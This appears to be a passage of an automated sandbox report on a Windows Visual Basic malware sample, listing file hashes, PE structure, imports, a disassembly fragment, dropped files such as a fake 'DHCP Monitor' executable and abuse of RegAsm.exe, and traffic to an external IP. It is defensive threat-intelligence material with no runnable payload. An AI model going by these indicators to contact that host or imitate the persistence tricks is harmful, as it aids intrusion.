SHA-256:	38D43DB6662484B3E873AC23026A9FE20E80B322579039F4B25AEB8E60318A42
SHA-512:	37325EB6DB0F73E3225B962E7263F76E7102835DB54495F4A23D4B22B56906EFEE14A446374C48E0DEF60E4E590BF04E032129AD54D2680E72B5D2891C600853
Malicious:	true
Preview:	:.HA5..H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.787365359936823
Encrypted:	false
SSDEEP:	3:oMty8WbSXgL4A:oMLWuQL4A
MD5:	EFD1636CFC3CC38FD7BABAE5CAC9EDE0
SHA1:	4D7D378ABEB682EEFBD039930C0EA996FBF54178
SHA-256:	F827D5B11C1EB3902D601C3E0B59BA32FE11C0B573FBF22FB2AF86BFD4651BBA
SHA-512:	69B2B0AB1A6E13395EF52DCB903B8E17D842E6D0D44F801FF2659CFD5EC343C8CC57928B02961FC7099AD43FF05633BAF5AC39042A00C8676D4FA8F6F8C2A5D7
Malicious:	false
Preview:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

\Device\ConDrv Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	236
Entropy (8bit):	4.932081504780073
Encrypted:	false
SSDEEP:	3:RGXKRjN3Mxm8fWWD2XBQFwuSaKwDDxRZjmKXVM8xUvAkIDaMAfFAqmV/l7pgechG:zx3M7J4BYRZBXVwLL0dxKaRFfnYJin
MD5:	3140AF53A08CE269E95F15F02653B5CA
SHA1:	1248AB171A7006A8972B07C8128E346C4E3C1E4E
SHA-256:	041D7B8A2F516085263D3022FCD2B716AD212FE564DC2CB5AC5D7E128BEAA257
SHA-512:	BB4DFF011D831D8CD6BA923E440B5B4C2A41BA118BA3D73AF0CC866C2FAD23003ACA86C27691E8CF9F37CA336A329D4B8683CFB70E3BF4BD8A5C5421E4DF62D3
Malicious:	false
Preview:	Microsoft (R) .NET Framework Assembly Registration Utility 2.0.50727.8922..Copyright (C) Microsoft Corporation 1998-2004. All rights reserved.....RegAsm : error RA0000 : Unable to locate input assembly '0' or one of its dependencies...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.174708300114262
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Variant.Razy.845229.13077.exe
File size:	106496
MD5:	532e58083cf5638b05f617fcbbb5d63b
SHA1:	98058e52de678575ff2327d129a58313af4a3fc0
SHA256:	75888910c75a9858137089eb35d48b6b1af6d43817e9a1dbb9fbc409fdaad511
SHA512:	eab390f92d05fcc3ba8d0474555c1db78becfdb81865d4fada0c292a3e50ea6ed00b875b99e5a4d6fd96fc3116416858b1c574e8d14b0564524e8eac849ed20a
SSDEEP:	1536:3qN/HQiDkZQzBkKgIYNP7dmoK2gKpKeBEYjBqN/HQi:gkZQzB6IY9dEKpKng
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\...T...%.......Rich............................PE..L...\L.J.................@...p......x........P....@

File Icon


Icon Hash:	d8d490d4c4bcdef9

Static PE Info

General
Entrypoint:	0x401378
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4A164C5C [Fri May 22 06:55:24 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5fb04c04dc9621084e24b4642ca2fed6

Entrypoint Preview

Instruction
push 004100F0h
call 00007F46F8CA4D95h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+4Dh], bh
enter 4739h, E0h
test byte ptr [eax-72h], FFFFFFDAh
popad
or eax, 06084A40h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push ebx
jo 00007F46F8CA4E07h
popad
imul esp, dword ptr [ebp+72h], 70h
push 66656E6Fh
popad
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or eax, 337C8890h
add edx, dword ptr [ebx]
dec edx
xchg edx, esp
add eax, esp
jmp 00007F46F8CA4D59h
and eax, 50F2FD35h
je 00007F46F8CA4D6Ch
jnle 00007F46F8CA4DEFh
xchg eax, ebp
les eax, fword ptr [edx]
wait
lodsb
stosd
movsb
lea edi, dword ptr [edx]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
daa
fld qword ptr [eax]
add byte ptr [eax+2Dh], cl
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [ecx+70h], ah
jo 00007F46F8CA4E14h
outsd
bound esp, dword ptr [ecx+74h]
imul eax, dword ptr [eax], 000B010Dh
inc esp
outsb
outsd
insd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14124	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0x3084	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x114	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x135ec	0x14000	False	0.337573242188	data	5.7034958497	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x2560	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0x3084	0x4000	False	0.105895996094	data	3.23453967052	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x193dc	0x1ca8	data
RT_ICON	0x18734	0xca8	data
RT_ICON	0x183cc	0x368	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1839c	0x30	data
RT_VERSION	0x18150	0x24c	data	Hungarian	Hungary

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaLateMemSt, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x040e 0x04b0
InternalName	Compurgato
FileVersion	1.00
CompanyName	ColdStone
Comments	ColdStone
ProductName	ColdStone
ProductVersion	1.00
OriginalFilename	Compurgato.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Hungarian	Hungary

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-11:57:30.237786	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 11:57:29.280534983 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.519085884 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.519177914 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.519809961 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.757846117 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758059978 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758138895 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.758244038 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758263111 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758280039 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758291960 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.758296967 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758323908 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.758330107 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758371115 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.758378983 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758399010 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758440018 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.758719921 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.758763075 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997093916 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997114897 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997128010 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997139931 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997268915 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997319937 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997556925 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997575045 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997591019 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997607946 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997611046 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997625113 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997639894 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997646093 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997663975 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997668982 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997680902 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997698069 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997699976 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997714996 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997723103 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997730970 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997746944 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997761965 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997761965 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997781992 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:29.997801065 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:29.997833014 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.238229036 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238250971 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238266945 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238286018 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238307953 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238326073 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238327026 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.238348961 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.238365889 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.238420010 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241105080 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241126060 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241143942 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241168022 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241188049 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241194963 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241208076 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241219044 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241240978 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241240978 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241265059 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241282940 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241288900 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241316080 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241322994 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241338968 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241352081 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241367102 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241410971 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241415024 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241422892 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241437912 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241451979 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241461039 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241477013 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241487026 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241498947 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241511106 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241525888 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241538048 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241549969 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241561890 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241573095 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241585016 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241597891 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241607904 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241624117 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241625071 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241641998 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241647959 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241660118 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241676092 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241677999 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241695881 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241714001 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241714001 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.241735935 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.241769075 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.242944002 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.242965937 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.243019104 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.243051052 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.477957010 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.477981091 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.477997065 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478013039 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478029966 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478049040 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478070021 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478091002 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478108883 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478130102 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478128910 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.478153944 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478176117 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478188992 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.478198051 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478221893 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.478224039 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.478247881 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.478283882 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.479932070 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.479952097 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.479969025 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.479986906 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.480007887 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.480011940 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.480040073 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.480047941 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.480062962 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.480082989 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.480113029 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.480580091 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.480637074 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.480937958 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.480957985 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.480973959 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.480992079 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.480998039 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481028080 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.481061935 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.481277943 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481297016 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481316090 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481329918 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.481340885 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481364965 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.481365919 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481404066 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.481410980 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481435061 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481453896 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.481462002 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481484890 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.481487036 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481509924 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481511116 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.481534004 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.481535912 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.481559038 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.481581926 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482372046 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482393026 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482412100 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482433081 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482439041 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482459068 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482481003 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482482910 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482511044 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482513905 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482534885 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482558012 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482558966 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482583046 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482595921 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482610941 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482625961 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482635975 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482641935 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482662916 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482677937 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482686043 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482712984 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482713938 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482733965 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482738972 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482760906 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482768059 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482781887 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482781887 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482803106 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482825041 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482845068 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482850075 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482856989 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482872963 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482897043 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482898951 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482920885 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482920885 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482943058 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482949972 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482969999 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482981920 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.482995987 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.482996941 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.483016014 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.483040094 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.483057976 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.483062029 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.483087063 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.483095884 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.483110905 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.483119011 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.483136892 CET	80	49741	103.150.60.242	192.168.2.5
